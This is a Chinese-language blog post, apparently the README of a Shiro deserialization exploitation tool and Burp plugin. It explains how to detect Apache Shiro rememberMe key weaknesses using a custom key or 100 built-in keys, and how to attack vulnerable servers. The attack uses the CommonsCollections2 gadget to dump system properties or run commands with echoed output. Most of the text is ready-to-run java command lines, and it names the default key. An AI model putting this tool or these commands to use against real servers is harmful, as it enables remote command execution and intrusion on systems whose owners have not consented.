Shiro 回显利用工具(burp

mvn package 编译

欢迎关注 宽字节安全 公众号

changelog

  1. 新增shiro 检测方式(对,就是那个不需要gadget的检测方式) 2020.7.30
  2. 新增shiro 100 key
  3. 支持自定义key
  4. 支持作为插件导入burp

burp插件使用方法

repeater界面中右键,生成payload

默认kph密钥,cc2利用链,获取信息,如果需要修改,请右键选择config

生成后,会自动替换request内容,并攻击

当然,这个jar包也可以直接在命令行下运行,生成rememberMe,或者检测,一切不变

自定义key检测

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/ kPH+bIxk5D2deZiIxcaaaA==

内置100key检测

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar kPH+bIxk5D2deZiIxcaaaA== CommonsCollections2 XraySysProp

检测方式

运行

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc 

检测

java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/

shiro-urldns 检测&利用工具

支持shiro 16个key,支持攻击利用。支持的key与gadget以及攻击类型如下

查看目标服务器的系统信息

该攻击类型为XraySysProp,使用方法如下

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XraySysProp

利用截图如下

执行命令并回显

该攻击类型为XrayCmd 使用方法如下

java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XrayCmd

利用截图如下

注意事项

  1. 建议删除不相关的http请求头,不然会因为http请求头过大而提示400错误
  2. 建议使用CommonsCollections2 gadget,体积小,利用率高
posted @ 2020-07-26 17:16  一条狗的开发之路  阅读(4350)  评论(0编辑  收藏  举报